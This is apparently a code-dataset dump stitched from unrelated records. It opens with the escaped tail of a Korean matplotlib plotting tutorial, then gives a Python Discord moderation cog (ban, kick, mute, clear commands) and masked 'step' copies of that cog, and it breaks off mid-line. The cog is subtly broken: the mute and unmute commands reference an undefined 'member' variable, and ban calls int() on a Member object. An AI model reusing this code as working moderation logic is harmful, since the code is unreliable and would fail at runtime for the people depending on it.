label=\"sine\")\nplt.legend(loc=5)\nplt.show()\n\"\"\"\n\n# x축, y축 라벨, 타이틀\n# xlabel, ylabel, title로 지정\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC, S = np.cos(X), np.sin(X)\nplt.plot(X, C, label=\"cosine\")\nplt.xlabel(\"time\")\nplt.ylabel(\"amplitude\")\nplt.title(\"Cosine Plot\")\nplt.show()\n\"\"\"\n\n# 부가설명\n# annotate명령을 사용하여 그림내에 화살표를 포함한 부가 설명 넣을수 있음\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nS = np.sin(X)\nplt.plot(X, S, label=\"sine\")\nplt.scatter([0], [0], color=\"r\", linewidth=10)\nplt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),\n textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", linewidth=3, color=\"g\"))\nplt.show()\n\"\"\"\n\n\n# Figure [ Axes [ Axis] ] 의 구조이다\n# Figure : 여러개의 윈도우를 띄우거나, 그림의 크기 지정시 사용\n# plot사용시 자동으로 Figure를 생성하므로 명시적으로 생성할 필요는\n# 없음\n# figure객체를 얻으려면 gcf 명령 사용\n\"\"\"\nf1 = plt.figure(figsize=(100,2))\nplt.plot(np.random.randn(100))\nplt.show()\n\"\"\"\n\"\"\"\nf1 = plt.figure(1)\nplt.plot([1,2,3,4], 'ro:')\nf2= plt.gcf()\nprint(f1, id(f1))\nprint(f2, id(f2))\nplt.show()\n\"\"\"\n\n\n# Axes와 Subplot\n# 하나의 윈도우(Figure)안에 여러개의 플롯을 배열하는 경우 각각의 플롯은\n# Axes라고 불리는 객체에 속함\n# subplot 명령으로 Axes객체를 생성, plot명령 사용시 자동으로 Axes를 생성함\n# subplot은 그리드 형태의 Axes객체들을 생성\n# Figure가 행렬(matrix)이고 Axes가 행렬의 원소라고 생각하면 됨.\n# 위와 아래 두개의 플롯이 있는 경우 2X1행렬\n# subplot은 3개의 인수를 가지고 처음 2개가 행렬 정의, 세번째가 위치 지정\n\"\"\"\nx1 = np.linspace(0.0, 5.0)\nx2 = np.linspace(0.0, 2.0)\ny1 = np.cos(2 * np.pi * x1) * np.exp(-x1)\ny2 = np.cos(2 * np.pi * x2)\n\nax1 = plt.subplot(2, 1, 1)\nplt.plot(x1, y1, 'yo-')\nplt.title('A tale of 2 subplots')\nplt.ylabel('Dampled oscillation')\nprint(ax1)\n\nax2 = plt.subplot(2, 1, 2)\nplt.plot(x2, y2, 'r.-')\nplt.xlabel('time (s)')\nplt.ylabel('Undamped')\nprint(ax2)\n\nplt.show()\n\"\"\"\n\n# subplot의 인수는 (2,2,1)를 줄여서 221로 표시 가능\n\"\"\"\nplt.subplot(221); plt.plot([1,2]); plt.title(1)\nplt.subplot(222); plt.plot([1,2]); plt.title(2)\nplt.subplot(223); plt.plot([1,2]); plt.title(3)\nplt.subplot(224); plt.plot([1,2]); plt.title(4)\nplt.tight_layout()\nplt.show()\n\"\"\"\n\n\n# xkcd 스타일\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\n\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label=\"cosine\")\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,\n -50), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", linewidth=3, color=\"g\"))\nplt.show()\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import discord
from discord.ext import commands
import datetime
from discord.utils import get
from discord import User
class Sinner(commands.Converter):
async def convert(self, ctx, argument):
argument = await commands.MemberConverter().convert(ctx, argument)
permission = argument.guild_permissions.manage_messages
if not permission:
return argument
else:
raise commands.BadArgument("You cannot punish other staff members")
class Redeemed(commands.Converter):
async def convert(self, ctx, argument):
argument = await commands.MemberConverter().convert(ctx, argument)
muted = discord.utils.get(ctx.guild.roles, name="Muted")
if muted in argument.roles:
return argument
else:
raise commands.BadArgument("The user was not muted.")
async def mute(ctx, user, reason="No reason"):
role = discord.utils.get(ctx.guild.roles, name="Muted")
if not role:
try:
muted = await ctx.guild.create_role(name="Muted", reason="To use for muting")
for channel in ctx.guild.channels:
await channel.set_permissions(muted, send_messages=False,
read_message_history=False,
read_messages=False)
except discord.Forbidden:
return await ctx.send("I have no permissions to make a muted role")
await user.add_roles(muted)
await ctx.send(f"{user.mention} has been muted for {reason}")
else:
await user.add_roles(role)
await ctx.send(f"{user.mention} has been muted for {reason}")
channel = ctx.bot.get_channel(718865797006753892)
await channel.send(f"{user.mention}, welcome to the bad kids club.")
class Moderation(commands.Cog):
"""Moderation Commands"""
def __init__(self, bot):
self.bot = bot
@commands.command(name="ban")
@commands.has_permissions(ban_members=True)
async def ban(self, ctx, member: discord.Member, *, reason="No reason"):
"""Bans someone"""
if member == None or member == ctx.message.author:
await ctx.send("You cannot ban yourself!")
return
try:
memberid = await self.bot.fetch_user(int(member))
await member.ban(reason=reason) or await memberid.ban(reason=reason)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.")
else:
embed = discord.Embed(title=f"`{ctx.author}` banned {member}", colour=member.color, timestamp=datetime.datetime.utcnow())
embed.add_field(name="● Details:", value=f" - Reason: {reason}")
embed.set_footer(icon_url=f"{ctx.author.avatar_url}", text=f"{ctx.author.top_role.name} ")
await ctx.send(embed=embed)
print(ctx.author.name, 'used the command ban')
@commands.command()
@commands.has_permissions(ban_members=True)
async def unban(self, ctx, member, *, reason="No reason"):
print("unbanned")
if member == None or member == ctx.message.author:
await ctx.send("You cannot unban yourself!")
return
try:
member = await self.bot.fetch_user(int(member))
await ctx.guild.unban(member, reason=reason)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.")
else:
await ctx.send(f"`{member}` was unbanned by **{ctx.author.name}**.")
print(ctx.author.name, 'used the command unban')
@commands.command(name="kick")
@commands.has_permissions(kick_members=True)
async def kick(self, ctx, member: discord.Member, *, reason="No reason"):
"""Kicks someone"""
if member == None or member == ctx.message.author:
await ctx.send("You cannot kick yourself!")
return
try:
await member.kick(reason=reason)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.")
else:
embed = discord.Embed(title=f"`{ctx.author}` kicked {member}", colour=member.color, timestamp=datetime.datetime.utcnow())
embed.add_field(name="● Details:", value=f" - Reason: {reason}")
embed.set_footer(icon_url=f"{ctx.author.avatar_url}", text=f"{ctx.author.top_role.name} ")
await ctx.send(embed=embed)
print(ctx.author.name, 'used the command kick')
@commands.command(name="clear")
@commands.has_permissions(manage_messages=True)
async def clear(self, ctx, amount: int):
"""Clears messages."""
channel = ctx.channel
try:
await channel.purge(limit=amount+1)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.")
else:
await ctx.send(f"{amount} messages deleted.")
@clear.error
async def clear_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to specify an amount of messages, i can't purge air...")
if isinstance(error, commands.BadArgument):
await ctx.send("Give me a valid number.")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permission to use this command.")
raise error
@kick.error
async def kick_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who to kick.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permission to use this command.")
raise error
@ban.error
async def ban_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who to ban.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?.")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permission to use this command.")
raise error
@commands.command()
async def mute(self, ctx, user: Sinner, reason=None):
"""Mutes a user."""
if member == None or member == ctx.message.author:
await ctx.send("You cannot mute yourself!")
return
await mute(ctx, user, reason or "treason")
@commands.command()
async def unmute(self, ctx, user: Redeemed):
"""Unmutes a muted user"""
if member == None or member == ctx.message.author:
await ctx.send("You cannot unmute yourself!")
return
await user.remove_roles(discord.utils.get(ctx.guild.roles, name="Muted"))
await ctx.send(f"{user.mention} has been unmuted")
@mute.error
async def mute_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who do you want to mute.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permissions to use this command.")
@unmute.error
async def unmute_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who do you want to unmute.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permissions to use this command.")
@unban.error
async def unban_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who do you want to unban.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permissions to use this command.")
def setup(bot):
bot.add_cog(Moderation(bot))
|
normal
|
{
"blob_id": "16cd89a43a1985276bd14d85ad8ddb990c4d82c3",
"index": 6136,
"step-1": "<mask token>\n\n\nclass Redeemed(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name='Muted')\n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument('The user was not muted.')\n\n\n<mask token>\n\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='ban')\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot ban yourself!')\n return\n try:\n memberid = await self.bot.fetch_user(int(member))\n await member.ban(reason=reason) or await memberid.ban(reason=reason\n )\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` banned {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason='No reason'):\n print('unbanned')\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unban yourself!')\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'`{member}` was unbanned by **{ctx.author.name}**.'\n )\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name='kick')\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot kick yourself!')\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` kicked {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n @commands.command(name='clear')\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount + 1)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'{amount} messages deleted.')\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n \"You need to specify an amount of messages, i can't purge air...\"\n )\n if isinstance(error, commands.BadArgument):\n await ctx.send('Give me a valid number.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to kick.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to ban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot mute yourself!')\n return\n await mute(ctx, user, reason or 'treason')\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unmute yourself!')\n return\n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\n 'Muted'))\n await ctx.send(f'{user.mention} has been unmuted')\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to mute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unmute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Sinner(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n permission = argument.guild_permissions.manage_messages\n if not permission:\n return argument\n else:\n raise commands.BadArgument('You cannot punish other staff members')\n\n\nclass Redeemed(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name='Muted')\n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument('The user was not muted.')\n\n\n<mask token>\n\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='ban')\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot ban yourself!')\n return\n try:\n memberid = await self.bot.fetch_user(int(member))\n await member.ban(reason=reason) or await memberid.ban(reason=reason\n )\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` banned {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason='No reason'):\n print('unbanned')\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unban yourself!')\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'`{member}` was unbanned by **{ctx.author.name}**.'\n )\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name='kick')\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot kick yourself!')\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` kicked {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n @commands.command(name='clear')\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount + 1)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'{amount} messages deleted.')\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n \"You need to specify an amount of messages, i can't purge air...\"\n )\n if isinstance(error, commands.BadArgument):\n await ctx.send('Give me a valid number.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to kick.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to ban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot mute yourself!')\n return\n await mute(ctx, user, reason or 'treason')\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unmute yourself!')\n return\n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\n 'Muted'))\n await ctx.send(f'{user.mention} has been unmuted')\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to mute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unmute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Sinner(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n permission = argument.guild_permissions.manage_messages\n if not permission:\n return argument\n else:\n raise commands.BadArgument('You cannot punish other staff members')\n\n\nclass Redeemed(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name='Muted')\n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument('The user was not muted.')\n\n\nasync def mute(ctx, user, reason='No reason'):\n role = discord.utils.get(ctx.guild.roles, name='Muted')\n if not role:\n try:\n muted = await ctx.guild.create_role(name='Muted', reason=\n 'To use for muting')\n for channel in ctx.guild.channels:\n await channel.set_permissions(muted, send_messages=False,\n read_message_history=False, read_messages=False)\n except discord.Forbidden:\n return await ctx.send('I have no permissions to make a muted role')\n await user.add_roles(muted)\n await ctx.send(f'{user.mention} has been muted for {reason}')\n else:\n await user.add_roles(role)\n await ctx.send(f'{user.mention} has been muted for {reason}')\n channel = ctx.bot.get_channel(718865797006753892)\n await channel.send(f'{user.mention}, welcome to the bad kids club.')\n\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='ban')\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot ban yourself!')\n return\n try:\n memberid = await self.bot.fetch_user(int(member))\n await member.ban(reason=reason) or await memberid.ban(reason=reason\n )\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` banned {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason='No reason'):\n print('unbanned')\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unban yourself!')\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'`{member}` was unbanned by **{ctx.author.name}**.'\n )\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name='kick')\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot kick yourself!')\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` kicked {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n @commands.command(name='clear')\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount + 1)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'{amount} messages deleted.')\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n \"You need to specify an amount of messages, i can't purge air...\"\n )\n if isinstance(error, commands.BadArgument):\n await ctx.send('Give me a valid number.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to kick.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to ban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot mute yourself!')\n return\n await mute(ctx, user, reason or 'treason')\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unmute yourself!')\n return\n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\n 'Muted'))\n await ctx.send(f'{user.mention} has been unmuted')\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to mute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unmute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n\ndef setup(bot):\n bot.add_cog(Moderation(bot))\n",
"step-4": "import discord\nfrom discord.ext import commands\nimport datetime\nfrom discord.utils import get\nfrom discord import User\n\n\nclass Sinner(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n permission = argument.guild_permissions.manage_messages\n if not permission:\n return argument\n else:\n raise commands.BadArgument('You cannot punish other staff members')\n\n\nclass Redeemed(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name='Muted')\n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument('The user was not muted.')\n\n\nasync def mute(ctx, user, reason='No reason'):\n role = discord.utils.get(ctx.guild.roles, name='Muted')\n if not role:\n try:\n muted = await ctx.guild.create_role(name='Muted', reason=\n 'To use for muting')\n for channel in ctx.guild.channels:\n await channel.set_permissions(muted, send_messages=False,\n read_message_history=False, read_messages=False)\n except discord.Forbidden:\n return await ctx.send('I have no permissions to make a muted role')\n await user.add_roles(muted)\n await ctx.send(f'{user.mention} has been muted for {reason}')\n else:\n await user.add_roles(role)\n await ctx.send(f'{user.mention} has been muted for {reason}')\n channel = ctx.bot.get_channel(718865797006753892)\n await channel.send(f'{user.mention}, welcome to the bad kids club.')\n\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='ban')\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot ban yourself!')\n return\n try:\n memberid = await self.bot.fetch_user(int(member))\n await member.ban(reason=reason) or await memberid.ban(reason=reason\n )\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = 